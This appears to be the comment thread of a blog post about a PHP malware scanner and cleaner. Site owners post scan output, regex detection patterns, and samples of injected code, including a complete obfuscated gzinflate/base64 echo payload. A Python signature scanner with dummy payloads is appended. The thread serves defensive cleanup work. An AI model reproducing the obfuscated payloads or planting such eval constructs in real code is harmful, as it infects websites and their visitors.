        -long_text - create_function('$'.'v',$ad[7].$ad[9].$ad[1].$ad[1
        -long_text - FZdFssUIckWX01WhgZjC4YGYmTVxiOGJWVq9f2/hQt6T1ZUN/z

        * ./LICENSE.php
        -long_text - create_function('$'.'v',$ad[15].$ad[22].$ad[4].$ad
        -long_text - DZdHDqzYEkSX0++JAd7pqwd4700Bkxbem8LD6n+t4N4MnYyILM

        * ./COPYRIGHT.php
        -long_text - create_function('$'.'v',$ad[18].$ad[10].$ad[6].$ad
        -long_text - DZe1rsZKEoQfZ++VAzNpIzMzO1kZfzPz0+8JJhtp1N1VX9dUVz

        * ./CREDITS.php
        -long_text - create_function('$'.'v',$ad[9].$ad[22].$ad[1].$ad[
        -long_text - DZbFysYKtkQfp88hg7hx6UHc3TNp4i5fPHn6+483bIpaUFXVlY
        .
        .
        .

        I’ll send the full result by email to info@php-beginners.com

        Thanks

        • Paolo says:

          Hello Meysam,

          Thanks for using my script. Those are really malware codes.
          You need to clean those files.

          Paolo

  108. Gelo says:

    Your script works fine :) thank you very much with so much respect :) greetings from Greece! You saved me. ;D

  109. Steve says:

    Hi,

    It looks like the cleaner worked! Grand thanks!!! However when running the scan I get this:

    ./wp-includes-copy/js/codepress
    * ./wp-includes-copy/js/codepress/codepress.js
    -eval - eval(id+' = new CodePress(t[i]
    -eval - eval(id

    ./wp-includes-copy/js/codepress/engines/

    200 OK

    OK
    The server encountered an internal error or
    misconfiguration and was unable to complete
    your request.
    Please contact the server administrator
    and inform them of the time the error occurred,
    and anything you might have done that may have
    caused the error.
    More information about this error may be available
    in the server error log.

    Apache Server at cdlworkshop.com Port 80

    Is this normal?

    =-Steve

    • Paolo says:

      Hello Steve,

      That’s not normal. I’m not really sure what happened. Can you try running the scanner again?
      See if it still shows an error? Maybe it’s just your server. :)

      Let me know. Paolo

  110. Hey exceptional website! Does running a blog similar to this require a large amount of work?
    I have no understanding of programming however I had been hoping to start my own blog soon.
    Anyhow, should you have any ideas or techniques for new blog owners please share.
    I know this is off topic but I simply had to ask.
    Thank you!

  111. Cosy says:

    HI,

    My site is infected and I ran the cleaner but it didn’t remove any base64 codes. So I just sent the full log to info@php-beginners.com, pls check and update your file.
    ————–code——————-
    #c3284d#
    echo(gzinflate(base64_decode("TctJCoAwDEDRq5QcoNmL9i7pQG3pRBpFb6/gxu37/HU6TkOU3CNsIOESzHTSp6AKtXhQfNNfJ7sNdpGxIIZquScfuFLTrldNB/maGpYUd7H90nmCMit+s3kA")));
    #/c3284d#

    ———————————————————-
    Cosy

  112. Cosy says:

    got this error?

    Fatal error: Allowed memory size of 67108864 bytes exhausted (tried to allocate 76826 bytes) in /home/embroide/public_html/scanner_2.6.php on line 239

  113. Cosy says:

    HI,

    Somehow the cleaner is not cleaning the php files? I ran the scanner and found the following

    ./
    * ./index.php
    -long_text - +-------------------------------------------------
    -long_text - base64_decode("TctJCoAwDEDRq5QcoNmL9i7pQG3pRBpFb6/

  114. mcosy says:

    HI,

    How to find this malware code ?

    #c3284d#
    echo(gzinflate(base64_decode("TctJCoAwDEDRq5QcoNmL9i7pQG3pRBpFb6/gxu37/HU6TkOU3CNsIOESzHTSp6AKtXhQfNNfJ7sNdpGxIIZquScfuFLTrldNB/maGpYUd7H90nmCMit+s3kA")));
    #/c3284d#

  115. Kyle says:

    Thank you!! Your cleaner worked like a charm!! What a nasty bug.

  116. Pingback: CCO. Alerts Page « support for www.catholic-church.org sites

  117. Rosh says:

    Hi.

    My site got infected with loads of nasty stuff.
    I am a bit relieved that I reached your website. I have run the scanner_2.6.php file via ssh.
    On my server side, I discovered that a scanner_log is created, but it shows 0kb at the beginning.
    Is this normal ?

  118. Fabiano says:

    I found this in some sites :

  119. Billy says:

    I’m trying to clean our site, but the code keeps infecting the site faster than it can be cleaned.
    I figured out that’s because some of the folders on the server contain thousands of subfolders with text files in them (log folders, temp folders and those types of folders), and the scan of those folders takes too long. A scan takes more than 24 hours.

    Is there a way to exclude a folder from the scan?

    I am talking about both your cleaner script and your scanner script.
    If that is possible, I can exclude those folders that I know for certain cannot contain any malicious code, including some sites that don’t have any php files in them at all.

  120. Paul says:

    My site was infected by the following malicious code:

    I ran the cleaner script but it didn’t detect anything, is it because the pattern of this malicious code is a little different?
    Thanks for answer…

  121. Paul says:

    try again to post the code

    php /**/ eval(base64_decode("aWYoZnV......"));

  122. Paul says:

    Sorry for lots of posts…just want to share some feedback in my case.
    I tried both cleaner-cli_2.10.php and cleaner_2.10.php, they cannot detect the type B. Trojan malicious code in my site.
    I finally made the script work by changing to:

    $find = "\s*eval\(base64_decode\([\"'][^\"']{255,}[\"']\)\);";

    Really grateful for the author and all the previous posts, thanks.

  123. Noé Facq says:

    HI everyone,
    I’m a French blogger and I’m not sure I understand the trick well:
    -I put the cleaner_2.10.php to the root of my site
    And I tried to run the script browsing this url http://www.astuces-argent.net/cleaner_2.10.php
    in google chrome but I had a 404 page instead.
    Should I try the cleaner-cli_2.10 instead?

    Surely I made a mistake I can’t imagine
    regards,
    Noé

  124. Pingback: Free Website Malware Scanner | Digi ads development

  125. Alex says:

    Thank you for the good work.
    Some injections use the strrev() function,
    so you also need to search for ‘edoced_46esab’ (or another pattern) which is transformed into ‘base64_decode’.
    Now I have one site on WP with code injected into the wp_head() function.
    The site works only with wp_head disabled; I tried switching off the add_action wp_head calls one by one in default-filters.php but the script with frames is not going away. Still trying to find it.

  126. Pingback: Virus Appending Base64 Code to All PHP files - Web Design London

  127. daniel says:

    Recently I found a script injection on my web server, which contains more than 2 GB of websites.

    The malicious code is like so:

    Is there a way the scanner can monitor it too? So I can remove it without breaking the websites’ design or integrity.

    thank you

    daniel

  128. XXX says:

    Hi,

    I believe you also need to add the following to the $aPattern variable of the cleaner:
    "\s*eval\(gzinflate\(base64_decode\([\"'][^\"']{255,}[\"']\)\)\);",
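
The patterns collected across this thread (Paul's `eval(base64_decode(...))` regex, XXX's `gzinflate` variant above, the `#d93065#`/`#c3284d#` `echo(gzinflate(base64_decode(...)))` blocks Eric and Cosy posted, Alex's `strrev('edoced_46esab')` trick, and the `create_function('$'.'v', $ad[...])` construct in Meysam's scan output and the head of this page) can be kept in one signature table, and Billy's request to skip log and temp folders is a one-line prune in the directory walk. The following is an added example in Python, not Paolo's `cleaner_2.x` and not code any commenter posted. Only the three self-contained statements are deleted outright; the `strrev` and `create_function` fragments are part of a larger construct, so cutting just the fragment would leave broken code, and the scanner reports them instead. The directory names to skip are passed in by the caller; the sample tree in `demo()` is constructed with dummy payloads.

```python
"""Signature scanner/cleaner for injected PHP, with directory exclusions.

Added example; not Paolo's cleaner_2.x. The pattern list is built only from
snippets quoted in the comments above; sample files in demo() are constructed
and carry dummy payloads. Directory names to skip (Billy's log/temp folders)
are passed in by the caller.
"""
from __future__ import annotations

import os
import re
import shutil
import tempfile

SIGNATURES = {
    # Paul: eval(base64_decode("<255+ chars>"));
    "eval_base64": re.compile(
        r"\s*eval\(base64_decode\([\"'][^\"']{255,}[\"']\)\);"),
    # XXX: the same with gzinflate in between
    "eval_gzinflate_base64": re.compile(
        r"\s*eval\(gzinflate\(base64_decode\([\"'][^\"']{255,}[\"']\)\)\);"),
    # Eric / Cosy: #d93065# echo(gzinflate(base64_decode(...))); #/d93065#
    "hash_block_echo": re.compile(
        r"#([0-9a-f]{6})#\s*echo\(gzinflate\(base64_decode\([\"'][^\"']+[\"']\)\)\);\s*#/\1#"),
    # Alex: strrev('edoced_46esab') rebuilds the name base64_decode at run time
    "strrev_base64": re.compile(r"strrev\(\s*[\"']edoced_46esab[\"']\s*\)"),
    # Meysam's scan output / head sample: create_function('$'.'v', $ad[...]...)
    "create_function_idx": re.compile(
        r"create_function\(\s*[\"']\$[\"']\s*\.\s*[\"']v[\"']\s*,"),
}

# Only self-contained statements are safe to delete outright; the other two
# signatures are fragments of a larger construct and are reported, not cut.
REMOVABLE = ("eval_base64", "eval_gzinflate_base64", "hash_block_echo")


def scan_content(content: str) -> list[str]:
    """Names of every signature that matches somewhere in content."""
    return [name for name, pat in SIGNATURES.items() if pat.search(content)]


def clean_content(content: str) -> tuple[str, list[str]]:
    """Strip removable signatures; return (cleaned, names_removed)."""
    removed = []
    for name in REMOVABLE:
        content, count = SIGNATURES[name].subn("", content)
        if count:
            removed.append(name)
    return content, removed


def scan_tree(root: str,
              exclude_dirs: tuple[str, ...] = (),
              exts: tuple[str, ...] = (".php", ".html")) -> dict[str, list[str]]:
    """Map relative path -> matched signatures, skipping excluded directory names."""
    hits: dict[str, list[str]] = {}
    for dirpath, dirs, files in os.walk(root):
        dirs[:] = [d for d in dirs if d not in exclude_dirs]  # prune in place
        for name in files:
            if not name.endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = scan_content(fh.read())
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits


def demo() -> dict[str, list[str]]:
    """Constructed tree: one hit per signature kind, plus an excluded log folder."""
    root = tempfile.mkdtemp()
    try:
        blob = "A" * 300  # stands in for a long base64 payload (constructed)
        samples = {
            "index.php": f'<?php eval(base64_decode("{blob}"));\necho "site";\n',
            "index.html": '#c3284d#\necho(gzinflate(base64_decode("QUFB")));\n#/c3284d#\n',
            "lib.php": "<?php $f = strrev('edoced_46esab'); // flagged, not cut\n",
            "logs/old.php": f'<?php eval(base64_decode("{blob}"));\n',  # pruned
        }
        for rel, body in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root, exclude_dirs=("logs", "tmp"))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(demo())
```

The `{255,}` length floor in the first two patterns is what keeps short, legitimate `base64_decode` calls out of the results; an exclusion list should name only directories that cannot hold executable files, since a writable log or temp folder is exactly where dropped-in PHP tends to land.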

  129. Pingback: Automated Fix for Wordpress base64_decode Injection in PHP Files • Raymond.CC
